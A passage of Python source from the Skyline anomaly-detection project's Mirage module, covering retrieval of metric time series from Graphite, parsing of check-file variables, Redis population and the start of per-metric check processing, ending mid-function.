# Reduce amount of Manager instances that are used as each requires a
# copy of entire memory to be copied into each subprocess so this
# results in a python process per Manager instance, using as much
# memory as the parent. OK on a server, not so much in a container.
# Disabled all the Manager().list() below and replaced with Redis sets
# self.anomalous_metrics = Manager().list()
self.mirage_exceptions_q = Queue()
self.mirage_anomaly_breakdown_q = Queue()
# self.not_anomalous_metrics = Manager().list()
# self.metric_variables = Manager().list()
# self.ionosphere_metrics = Manager().list()
# self.sent_to_crucible = Manager().list()
# self.sent_to_panorama = Manager().list()
# self.sent_to_ionosphere = Manager().list()
# @added 20170603 - Feature #2034: analyse_derivatives
# @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Use get_redis_conn and get_redis_conn_decoded to use on Redis sets when the bytes
# types need to be decoded as utf-8 to str
# if settings.REDIS_PASSWORD:
# self.redis_conn = StrictRedis(
# password=settings.REDIS_PASSWORD,
# unix_socket_path=settings.REDIS_SOCKET_PATH)
# else:
# self.redis_conn = StrictRedis(
# unix_socket_path=settings.REDIS_SOCKET_PATH)
# @added 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Added a single functions to deal with Redis connection and the
# charset='utf-8', decode_responses=True arguments required in py3
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
def check_if_parent_is_alive(self):
"""
Self explanatory
"""
try:
kill(self.current_pid, 0)
kill(self.parent_pid, 0)
except:
# @added 20201203 - Bug #3856: Handle boring sparsely populated metrics in derivative_metrics
# Log warning
logger.warn('warning :: parent or current process dead')
exit(0)
# @modified 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms
def spawn_alerter_process(self, alert, metric, second_order_resolution_seconds, context, triggered_algorithms):
"""
Spawn a process to trigger an alert. This is used by smtp alerters so
that matplotlib objects are cleared down and the alerter cannot create
a memory leak in this manner and plt.savefig keeps the object in memory
until the process terminates. Seeing as data is being surfaced and
processed in the alert_smtp context, multiprocessing the alert creation
and handling prevents any memory leaks in the parent.
# @added 20160814 - Bug #1558: Memory leak in Analyzer
# Issue #21 Memory leak in Analyzer
# https://github.com/earthgecko/skyline/issues/21
"""
# @modified 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms
trigger_alert(alert, metric, second_order_resolution_seconds, context, triggered_algorithms)
# @modified 20201208 - Feature #3866: MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
# Task #3868: POC MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
# def surface_graphite_metric_data(self, metric_name, graphite_from, graphite_until):
def surface_graphite_metric_data(self, metric_name, graphite_from, graphite_until, high_res=False):
# @added 20160803 - Unescaped Graphite target - https://github.com/earthgecko/skyline/issues/20
# bug1546: Unescaped Graphite target
# @modified 20191107 - Branch #3263: py3
# Commented out colon
# new_metric_namespace = metric_name.replace(':', '\:')
# metric_namespace = new_metric_namespace.replace('(', '\(')
metric_namespace = metric_name.replace('(', '\(')
metric_name = metric_namespace.replace(')', '\)')
# @added 20201013 - Feature #3780: skyline_functions - sanitise_graphite_url
encoded_graphite_metric_name = encode_graphite_metric_name(skyline_app, metric_name)
try:
# We use absolute time so that if there is a lag in mirage the correct
# timeseries data is still surfaced relevant to the anomalous datapoint
# timestamp
if settings.GRAPHITE_PORT != '':
# @modified 20190520 - Branch #3002: docker
# Use GRAPHITE_RENDER_URI
# url = '%s://%s:%s/render/?from=%s&until=%s&target=%s&format=json' % (
# settings.GRAPHITE_PROTOCOL, settings.GRAPHITE_HOST,
# str(settings.GRAPHITE_PORT), graphite_from, graphite_until,
# metric_name)
url = '%s://%s:%s/%s/?from=%s&until=%s&target=%s&format=json' % (
settings.GRAPHITE_PROTOCOL, settings.GRAPHITE_HOST,
str(settings.GRAPHITE_PORT), settings.GRAPHITE_RENDER_URI,
# @modified 20201013 - Feature #3780: skyline_functions - sanitise_graphite_url
# graphite_from, graphite_until, metric_name)
graphite_from, graphite_until, encoded_graphite_metric_name)
else:
# @modified 20190520 - Branch #3002: docker
# Use GRAPHITE_RENDER_URI
# url = '%s://%s/render/?from=%s&until=%s&target=%s&format=json' % (
# settings.GRAPHITE_PROTOCOL, settings.GRAPHITE_HOST,
# graphite_from, graphite_until, metric_name)
url = '%s://%s/%s/?from=%s&until=%s&target=%s&format=json' % (
settings.GRAPHITE_PROTOCOL, settings.GRAPHITE_HOST,
settings.GRAPHITE_RENDER_URI, graphite_from, graphite_until,
# @modified 20201013 - Feature #3780: skyline_functions - sanitise_graphite_url
# metric_name)
encoded_graphite_metric_name)
r = requests.get(url)
js = r.json()
datapoints = js[0]['datapoints']
except:
logger.error(traceback.format_exc())
logger.error('error :: surface_graphite_metric_data :: failed to get data from Graphite')
return False
converted = []
for datapoint in datapoints:
try:
new_datapoint = [float(datapoint[1]), float(datapoint[0])]
converted.append(new_datapoint)
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
except: # nosec
continue
parsed = urlparse.urlparse(url)
target = urlparse.parse_qs(parsed.query)['target'][0]
metric_data_folder = str(settings.MIRAGE_DATA_FOLDER) + "/" + target
mkdir_p(metric_data_folder)
# @added 20201208 - Feature #3866: MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
# Task #3868: POC MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
if high_res:
with open(metric_data_folder + "/" + target + '.high_res', 'w') as f:
f.write(json.dumps(converted))
f.close()
return True
with open(metric_data_folder + "/" + target + '.json', 'w') as f:
f.write(json.dumps(converted))
f.close()
return True
return False
# @added 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Bug #1460: panorama check file fails
# Panorama check file fails #24
# Get rid of the skyline_functions imp as imp is deprecated in py3 anyway
def mirage_load_metric_vars(self, metric_vars_file):
"""
Load the metric variables for a check from a metric check variables file
:param metric_vars_file: the path and filename to the metric variables files
:type metric_vars_file: str
:return: the metric_vars list or ``False``
:rtype: list
"""
if os.path.isfile(metric_vars_file):
logger.info(
'loading metric variables from metric_check_file - %s' % (
str(metric_vars_file)))
else:
logger.error(
'error :: loading metric variables from metric_check_file - file not found - %s' % (
str(metric_vars_file)))
return False
metric_vars = []
with open(metric_vars_file) as f:
for line in f:
no_new_line = line.replace('\n', '')
no_equal_line = no_new_line.replace(' = ', ',')
array = str(no_equal_line.split(',', 1))
add_line = literal_eval(array)
metric_vars.append(add_line)
# @added 20200429 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Allow the check file to already hold a valid python list on one line
# so that a check can be added by simply echoing to debug metric_vars
# line from to log for any failed checks into a new Mirage check file
# The original above pattern is still the default, this is for the check
# files to be added by the operator from the log or for debugging.
try_literal_eval = False
if metric_vars:
if isinstance(metric_vars, list):
pass
else:
try_literal_eval = True
logger.info('metric_vars is not a list, set to try_literal_eval')
if len(metric_vars) < 2:
try_literal_eval = True
logger.info('metric_vars is not a list of lists, set to try_literal_eval')
else:
try_literal_eval = True
logger.info('metric_vars is not defined, set to try_literal_eval')
if try_literal_eval:
try:
with open(metric_vars_file) as f:
for line in f:
metric_vars = literal_eval(line)
if metric_vars:
break
except:
logger.error(traceback.format_exc())
logger.error('metric_vars not loaded with literal_eval')
metric_vars = []
string_keys = ['metric']
float_keys = ['value']
int_keys = ['hours_to_resolve', 'metric_timestamp']
# @added 20200916 - Branch #3068: SNAB
# Task #3744: POC matrixprofile
boolean_keys = ['snab_only_check']
# @added 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms to mirage_check_file
list_keys = ['triggered_algorithms']
metric_vars_array = []
for var_array in metric_vars:
# @modified 20181023 - Feature #2618: alert_slack
# Wrapped in try except for debugging issue where the
# hours_to_resolve was interpolating to hours_to_resolve = "t"
try:
key = None
value = None
if var_array[0] in string_keys:
key = var_array[0]
_value_str = str(var_array[1]).replace("'", '')
value_str = str(_value_str).replace('"', '')
value = str(value_str)
if var_array[0] == 'metric':
metric = value
if var_array[0] in float_keys:
key = var_array[0]
_value_str = str(var_array[1]).replace("'", '')
value_str = str(_value_str).replace('"', '')
value = float(value_str)
if var_array[0] in int_keys:
key = var_array[0]
_value_str = str(var_array[1]).replace("'", '')
value_str = str(_value_str).replace('"', '')
value = int(float(value_str))
# @added 20200916 - Branch #3068: SNAB
# Task #3744: POC matrixprofile
# Handle new snab_only_check boolean
if var_array[0] in boolean_keys:
key = var_array[0]
logger.debug(
'debug :: boolean key - key: %s, value: %s' % (
str(var_array[0]), str(var_array[1])))
if str(var_array[1]) == '"True"':
value = True
else:
value = False
# @added 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms to mirage_check_file
if var_array[0] in list_keys:
key = var_array[0]
logger.debug(
'debug :: list key - key: %s, value: %s' % (
str(var_array[0]), str(var_array[1])))
_value_str = str(var_array[1]).replace("'", '')
try:
value = literal_eval(var_array[1])
except Exception as e:
logger.error(
'error :: loading metric variables - failed to literal_eval list for %s, %s - %s' % (
str(key), str(var_array[1]), e))
value = []
if key:
metric_vars_array.append([key, value])
if len(metric_vars_array) == 0:
logger.error(
'error :: loading metric variables - none found' % (
str(metric_vars_file)))
return False
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to load metric variables from check file - %s' % (metric_vars_file))
return False
logger.info('debug :: metric_vars for %s' % str(metric))
logger.info('debug :: %s' % str(metric_vars_array))
return metric_vars_array
def dump_garbage(self):
"""
DEVELOPMENT ONLY
# @added 20160806 - Bug #1558: Memory leak in Analyzer
# Debug with garbage collection - http://code.activestate.com/recipes/65333/
show us what's the garbage about
"""
if ENABLE_MEMORY_PROFILING and garbage_collection_enabled:
# force collection
if settings.ENABLE_DEBUG or LOCAL_DEBUG:
logger.info('debug :: GARBAGE')
try:
gc.collect()
gc_collect_ok = True
except:
logger.error('error :: gc.collect failed')
logger.error(traceback.format_exc())
gc_collect_ok = False
if gc_collect_ok:
if settings.ENABLE_DEBUG or LOCAL_DEBUG:
logger.info('debug :: GARBAGE OBJECTS')
for x in gc.garbage:
s = str(x)
if len(s) > 80:
s = s[:80]
# print type(x), "\n ", s
try:
log_string = type(x), "\n ", s
log_string = 'unused variable for testing only'
except:
logger.error(traceback.format_exc())
logger.error('error :: print x and s')
if settings.ENABLE_DEBUG or LOCAL_DEBUG:
logger.info(log_string)
else:
return None
# @added 20200604 - Mirage - populate_redis
def populate_redis(self, i, metric):
"""
Get FULL_DURATION data from Graphite for a metric and populate Redis
"""
# Check if it has been done via the mirage.redis_populate key
redis_populated = False
redis_populated_key = 'mirage.redis_populated.%s' % metric
try:
redis_populated = self.redis_conn_decoded.get(redis_populated_key)
except Exception as e:
logger.error(
'error :: populate_redis :: could not query cache_key - %s - %s' % (
redis_populated_key, e))
redis_populated = False
# Do not handle batch processing metrics
batch_processing_metrics = []
try:
batch_processing_metrics = list(self.redis_conn_decoded.smembers('analyzer.batch_processing_metrics'))
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to get analyzer.batch_processing_metrics from Redis')
batch_processing_metrics = None
if batch_processing_metrics:
if metric in batch_processing_metrics:
redis_populated = True
logger.info('populate_redis :: %s is a batch processing metric, not handling, creating Redis key %s' % (
metric, redis_populated_key))
try:
self.redis_conn.setex(redis_populated_key, settings.FULL_DURATION, int(time()))
logger.info('populate_redis :: created Redis key %s' % (redis_populated_key))
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to create Redis key %s' % redis_populated_key)
if redis_populated:
logger.info('populate_redis :: the Redis key %s already exists, it has been done' % (redis_populated_key))
try:
self.redis_conn.srem('mirage.populate_redis', metric)
logger.info('populate_redis :: removed item - %s - from Redis set mirage.populate_redis' % (metric))
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to remove item %s from Redis set mirage.populate_redis' % metric)
return
time_now = int(time())
time_from = int(time_now - settings.FULL_DURATION)
# Calculate graphite from and until parameters from the metric timestamp
graphite_until = datetime.datetime.fromtimestamp(int(float(time_now))).strftime('%H:%M_%Y%m%d')
graphite_from = datetime.datetime.fromtimestamp(int(time_from)).strftime('%H:%M_%Y%m%d')
# Remove any old json file related to the metric
metric_data_folder = '%s/%s' % (settings.MIRAGE_DATA_FOLDER, metric)
metric_json_file = '%s/%s.json' % (metric_data_folder, str(metric))
try:
os.remove(metric_json_file)
except OSError:
pass
# Get data from graphite
logger.info('populate_redis :: surfacing %s time series from Graphite' % (metric))
try:
self.surface_graphite_metric_data(metric, graphite_from, graphite_until)
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to surface_graphite_metric_data to populate %s' % (
str(metric_json_file)))
# Check there is a json timeseries file to use
if not os.path.isfile(metric_json_file):
logger.error(
'error :: populate_redis :: retrieve failed - failed to surface %s time series from graphite' % (
metric))
try:
self.redis_conn.setex(redis_populated_key, settings.FULL_DURATION, time_now)
logger.info('populate_redis :: created Redis key %s' % (redis_populated_key))
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to create Redis key %s' % redis_populated_key)
try:
self.redis_conn.srem('mirage.populate_redis', metric)
logger.info('populate_redis :: removed item - %s - from Redis set mirage.populate_redis' % (metric))
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to remove item %s from Redis set mirage.populate_redis' % metric)
return
else:
logger.info('populate_redis :: retrieved data :: for %s' % (
metric))
self.check_if_parent_is_alive()
timeseries = []
try:
with open((metric_json_file), 'r') as f:
timeseries = json.loads(f.read())
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to get timeseries from json - %s' % metric_json_file)
timeseries = []
if not timeseries:
logger.info('populate_redis :: no timeseries data for %s, setting redis_populated_key and removing from mirage.populate_redis' % metric)
try:
self.redis_conn.setex(redis_populated_key, settings.FULL_DURATION, time_now)
logger.info('populate_redis :: created Redis key %s' % (redis_populated_key))
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to create Redis key %s' % redis_populated_key)
try:
self.redis_conn.srem('mirage.populate_redis', metric)
logger.info('populate_redis :: removed item - %s - from Redis set mirage.populate_redis' % (metric))
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to remove item %s from Redis set mirage.populate_redis' % metric)
return
try:
os.remove(metric_json_file)
except OSError:
pass
FULL_NAMESPACE = settings.FULL_NAMESPACE
pipe = None
logger.info('populate_redis :: time series data for %s, populating Redis with %s data points' % (
metric, str(len(timeseries))))
try:
pipe = self.redis_conn.pipeline()
except Exception as e:
logger.error('error :: populate_redis :: error on Redis pipe: %s' % (str(e)))
pipe = None
redis_populated = False
try:
for metric_data in timeseries:
key = ''.join((FULL_NAMESPACE, metric))
try:
pipe.append(str(key), packb(metric_data))
except Exception as e:
logger.error('error :: populate_redis :: error on pipe.append: %s' % (str(e)))
pipe.execute()
redis_populated = True
except Exception as e:
logger.error('error :: populate_redis :: error on pipe.execute: %s' % (str(e)))
if redis_populated:
del timeseries
try:
self.redis_conn.setex(redis_populated_key, settings.FULL_DURATION, time_now)
logger.info('populate_redis :: created Redis key %s' % (redis_populated_key))
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to create Redis key %s' % redis_populated_key)
# Add to Redis set so that Analyzer sorts and deduplicates the data
# on the next run
try:
self.redis_conn.sadd('mirage.filled', metric)
logger.info('populate_redis :: add %s to Redis set mirage.filled for Analyzer to sort and deduplicate the Redis data' % metric)
except Exception as e:
logger.error('error :: populate_redis :: failed add metric to Redis set mirage.filled: %s' % e)
try:
self.redis_conn.setex(redis_populated_key, settings.FULL_DURATION, time_now)
logger.info('populate_redis :: created Redis key %s' % (redis_populated_key))
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to create Redis key %s' % redis_populated_key)
try:
self.redis_conn.srem('mirage.populate_redis', metric)
logger.info('populate_redis :: removed item - %s - from Redis set mirage.populate_redis' % (metric))
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to remove item %s from Redis set mirage.populate_redis' % metric)
return
# @modified 20200909 - Task #3730: Validate Mirage running multiple processes
# def spin_process(self, i, run_timestamp):
def spin_process(self, i, run_timestamp, metric_check_filename):
"""
Assign a metric for a process to analyze.
"""
# if int(i) > 1:
# i_less_one = int(i) - 1
# sleep_for_str = '0.%s' % str(i_less_one)
# logger.info('process %s sleeping for %s' % (str(i), sleep_for_str))
# sleep(float(sleep_for_str))
# Discover metric to analyze
# metric_var_files = [f for f in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f))]
# Check if this process is unnecessary
# if len(metric_var_files) == 0:
# logger.info('no check files found, nothing to do')
# return
# metric_var_files_sorted = sorted(metric_var_files)
# @added 20200903 - Task #3730: Validate Mirage running multiple processes
# Ensure the process locks the check
# metric_check_filename = None
# for i_metric_check_file in metric_var_files_sorted:
# check_assigned = False
# cache_key = 'mirage.check.lock.%s' % str(i_metric_check_file)
# try:
# check_assigned = self.redis_conn.get(cache_key)
# if not check_assigned:
# try:
# self.redis_conn.setex(cache_key, 120, int(time()))
# metric_check_filename = str(i_metric_check_file)
# logger.info('assigned self check file and set Redis key - %s' % (cache_key))
# self.redis_conn.sadd('mirage.checks.done', metric_check_filename)
# break
# except:
# logger.error(traceback.format_exc())
# logger.error('error :: failed to set Redis key - %s' % cache_key)
# else:
# logger.info('already assigned, Redis key exists - %s' % (cache_key))
#
# except:
# logger.error(traceback.format_exc())
# logger.error('error :: failed to check if Redis key exists - %s' % cache_key)
if not metric_check_filename:
logger.info('no check to assign to process, nothing to do')
return
metric_check_file = '%s/%s' % (
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# settings.MIRAGE_CHECK_PATH, str(metric_var_files_sorted[0]))
settings.MIRAGE_CHECK_PATH, metric_check_filename)
check_file_name = os.path.basename(str(metric_check_file))
check_file_timestamp = check_file_name.split('.', 1)[0]
check_file_metricname_txt = check_file_name.split('.', 1)[1]
check_file_metricname = check_file_metricname_txt.replace('.txt', '')
check_file_metricname_dir = check_file_metricname.replace('.', '/')
metric_failed_check_dir = '%s/%s/%s' % (failed_checks_dir, check_file_metricname_dir, check_file_timestamp)
# Load metric variables
# @modified 20160822 - Bug #1460: panorama check file fails
# Changed to panorama style skyline_functions load_metric_vars
# self.load_metric_vars(metric_check_file)
# Load and validate metric variables
try:
# @modified 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Bug #1460: panorama check file fails
# Panorama check file fails #24
# Get rid of the skyline_functions imp as imp is deprecated in py3 anyway
# metric_vars = load_metric_vars(skyline_app, str(metric_check_file))
metric_vars_array = self.mirage_load_metric_vars(str(metric_check_file))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to load metric variables from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# Test metric variables
# if len(metric_vars.metric) == 0:
# logger.error('error :: failed to load metric variable from check file - %s' % (metric_check_file))
# return
# else:
# metric = metric_vars.metric
# metric_name = ['metric_name', metric_vars.metric]
# self.metric_variables.append(metric_name)
# logger.info('debug :: added metric_name %s from check file - %s' % (metric_name, metric_check_file))
metric = None
# @added 20200106 - Branch #3262: py3
# Task #3034: Reduce multiprocessing Manager list usage
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# redis_set_to_delete = 'mirage.metric_variables'
redis_metric_variables_set = 'mirage.%s.metric_variables' % str(i)
redis_set_to_delete = redis_metric_variables_set
try:
self.redis_conn.delete(redis_set_to_delete)
logger.info('deleted Redis set - %s' % redis_set_to_delete)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to delete Redis set - %s' % redis_set_to_delete)
try:
key = 'metric'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
metric = str(value_list[0])
metric_name = ['metric_name', metric]
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.metric_variables.append(metric_name)
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
redis_set = 'mirage.metric_variables'
data = str(metric_name)
try:
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# self.redis_conn.sadd(redis_set, data)
self.redis_conn.sadd(redis_metric_variables_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
logger.info('debug :: added metric_name %s from check file - %s' % (str(metric_name), metric_check_file))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to read metric variable from check file - %s' % (metric_check_file))
return
if not metric:
logger.error('error :: failed to load metric variable from check file - %s' % (metric_check_file))
return
# if len(metric_vars.value) == 0:
# return
# else:
# metric_value = ['metric_value', metric_vars.value]
# self.metric_variables.append(metric_value)
value = None
try:
key = 'value'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
value = float(value_list[0])
metric_value = ['metric_value', value]
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.metric_variables.append(metric_value)
redis_set = 'mirage.metric_variables'
data = str(metric_value)
try:
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# self.redis_conn.sadd(redis_set, data)
self.redis_conn.sadd(redis_metric_variables_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
except:
logger.error('error :: failed to read value variable from check file - %s' % (metric_check_file))
return
if not value:
# @modified 20181119 - Bug #2708: Failing to load metric vars
if value == 0.0:
pass
else:
logger.error('error :: failed to load value variable from check file - %s' % (metric_check_file))
return
# if len(metric_vars.hours_to_resolve) == 0:
# return
# else:
# hours_to_resolve = ['hours_to_resolve', metric_vars.hours_to_resolve]
# self.metric_variables.append(hours_to_resolve)
hours_to_resolve = None
try:
key = 'hours_to_resolve'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
hours_to_resolve = int(value_list[0])
hours_to_resolve_list = ['hours_to_resolve', hours_to_resolve]
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.metric_variables.append(hours_to_resolve_list)
redis_set = 'mirage.metric_variables'
data = str(hours_to_resolve_list)
try:
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# self.redis_conn.sadd(redis_set, data)
self.redis_conn.sadd(redis_metric_variables_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
except:
logger.error('error :: failed to read hours_to_resolve variable from check file - %s' % (metric_check_file))
return
if not hours_to_resolve:
logger.error('error :: failed to load hours_to_resolve variable from check file - %s' % (metric_check_file))
return
# if len(metric_vars.metric_timestamp) == 0:
# return
# else:
# metric_timestamp = ['metric_timestamp', metric_vars.metric_timestamp]
# self.metric_variables.append(metric_timestamp)
metric_timestamp = None
try:
key = 'metric_timestamp'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
metric_timestamp = int(value_list[0])
metric_timestamp_list = ['metric_timestamp', metric_timestamp]
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.metric_variables.append(metric_timestamp_list)
redis_set = 'mirage.metric_variables'
data = str(metric_timestamp_list)
try:
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# self.redis_conn.sadd(redis_set, data)
self.redis_conn.sadd(redis_metric_variables_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
except:
logger.error('error :: failed to read metric_timestamp variable from check file - %s' % (metric_check_file))
return
if not metric_timestamp:
logger.error('error :: failed to load metric_timestamp variable from check file - %s' % (metric_check_file))
return
# @added 20200916 - Branch #3068: SNAB
# Task #3744: POC matrixprofile
snab_only_check = None
try:
key = 'snab_only_check'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
snab_only_check = value_list[0]
except:
snab_only_check = None
snab_only_check_list = ['snab_only_check', snab_only_check]
redis_set = 'mirage.metric_variables'
data = str(snab_only_check_list)
try:
self.redis_conn.sadd(redis_metric_variables_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @added 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms to mirage_check_file
try:
key = 'triggered_algorithms'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
triggered_algorithms = value_list[0]
except:
triggered_algorithms = []
metric_data_dir = '%s/%s' % (settings.MIRAGE_DATA_FOLDER, str(metric))
# Ignore any metric check with a timestamp greater than MIRAGE_STALE_SECONDS
int_metric_timestamp = int(metric_timestamp)
int_run_timestamp = int(run_timestamp)
metric_timestamp_age = int_run_timestamp - int_metric_timestamp
periodic_mirage_check = False
if MIRAGE_PERIODIC_CHECK:
try:
mirage_periodic_check_metrics = list(self.redis_conn_decoded.smembers('mirage.periodic_check.metrics'))
except:
logger.error('error :: failed to get mirage_periodic_check_metrics from Redis')
mirage_periodic_check_metrics = []
redis_metric_name = '%s%s' % (settings.FULL_NAMESPACE, str(metric))
if redis_metric_name in mirage_periodic_check_metrics:
logger.info('this is a periodic Mirage check for %s' % metric)
periodic_mirage_check = True
# @added 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Do not evaluate batch metrics against MIRAGE_STALE_SECONDS
if BATCH_PROCESSING:
# Is this a analyzer_batch related anomaly
analyzer_batch_anomaly = None
analyzer_batch_metric_anomaly_key = 'analyzer_batch.anomaly.%s.%s' % (
str(metric_timestamp), metric)
try:
# analyzer_batch_anomaly = self.redis_conn.get(analyzer_batch_metric_anomaly_key)
analyzer_batch_anomaly = self.redis_conn_decoded.get(analyzer_batch_metric_anomaly_key)
except Exception as e:
logger.error(
'error :: could not query cache_key - %s - %s' % (
analyzer_batch_metric_anomaly_key, e))
analyzer_batch_anomaly = None
if analyzer_batch_anomaly:
logger.info('batch processing - identified as an analyzer_batch triggered anomaly from the presence of the Redis key %s' % analyzer_batch_metric_anomaly_key)
else:
logger.info('batch processing - not identified as an analyzer_batch triggered anomaly as no Redis key found - %s' % analyzer_batch_metric_anomaly_key)
if analyzer_batch_anomaly:
logger.info('batch processing - setting metric_timestamp_age from %s to 1 so that will not be discarded as stale on %s' % (
str(metric_timestamp_age), metric))
metric_timestamp_age = 1
if metric_timestamp_age > settings.MIRAGE_STALE_SECONDS:
logger.info('stale check :: %s check request is %s seconds old - discarding' % (metric, str(metric_timestamp_age)))
# Remove metric check file
# try:
# os.remove(metric_check_file)
# except OSError:
# pass
# return
if os.path.isfile(metric_check_file):
os.remove(metric_check_file)
logger.info('removed check file - %s' % (metric_check_file))
else:
logger.info('could not remove check file - %s' % (metric_check_file))
# Remove the metric directory
if os.path.exists(metric_data_dir):
try:
rmtree(metric_data_dir)
logger.info('removed data dir - %s' % metric_data_dir)
except:
logger.error('error :: failed to rmtree - %s' % metric_data_dir)
# @added 20200903 - Task #3730: Validate Mirage running multiple processes
redis_set = 'mirage.stale_check_discarded'
try:
self.redis_conn.sadd(redis_set, str(metric))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(metric), str(redis_set)))
return
# Calculate hours second order resolution to seconds
second_order_resolution_seconds = int(hours_to_resolve) * 3600
# Calculate graphite from and until parameters from the metric timestamp
graphite_until = datetime.datetime.fromtimestamp(int(float(metric_timestamp))).strftime('%H:%M_%Y%m%d')
int_second_order_resolution_seconds = int(float(second_order_resolution_seconds))
second_resolution_timestamp = int_metric_timestamp - int_second_order_resolution_seconds
graphite_from = datetime.datetime.fromtimestamp(int(second_resolution_timestamp)).strftime('%H:%M_%Y%m%d')
# Remove any old json file related to the metric
metric_json_file = '%s/%s.json' % (metric_data_dir, str(metric))
try:
os.remove(metric_json_file)
except OSError:
pass
# Get data from graphite
logger.info(
'retrieve data :: surfacing %s time series from graphite for %s seconds' % (
metric, str(second_order_resolution_seconds)))
# @modified 20191113 - Branch #3262: py3
# Wrapped in try
try:
self.surface_graphite_metric_data(metric, graphite_from, graphite_until)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to surface_graphite_metric_data to populate %s' % (
str(metric_json_file)))
# Check there is a json timeseries file to test
if not os.path.isfile(metric_json_file):
logger.error(
'error :: retrieve failed - failed to surface %s time series from graphite' % (
metric))
# @added 20200905 - Feature #3734: waterfall alerts
# Try a metric 3 times before removing the check file
remove_check_file = True
check_failed_key = 'mirage.check.data_retrieval_failed.%s.%s' % (
str(int_metric_timestamp), metric)
fail_count = 0
try:
fail_count = self.redis_conn.get(check_failed_key)
except:
fail_count = 0
if not fail_count:
fail_count = 0
fail_count += 1
if fail_count < 3:
remove_check_file = False
try:
self.redis_conn.setex(check_failed_key, 300, fail_count)
logger.info('updated fail_count to %s in %s' % (str(fail_count), check_failed_key))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to set Redis key %s with %s' % (
str(check_failed_key), str(fail_count)))
else:
logger.error('error :: fail_count is %s in %s, removing check file' % (str(fail_count), check_failed_key))
if remove_check_file:
# Remove metric check file
try:
os.remove(metric_check_file)
except OSError:
pass
# Remove the metric directory
try:
rmtree(metric_data_dir)
logger.info('removed data dir - %s' % metric_data_dir)
except:
logger.error('error :: failed to rmtree %s' % metric_data_dir)
return
else:
logger.info('retrieved data :: for %s at %s seconds' % (
metric, str(second_order_resolution_seconds)))
####
# @added 20201208 - Feature #3866: MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
# Task #3868: POC MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
use_high_res_file = False
if MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS:
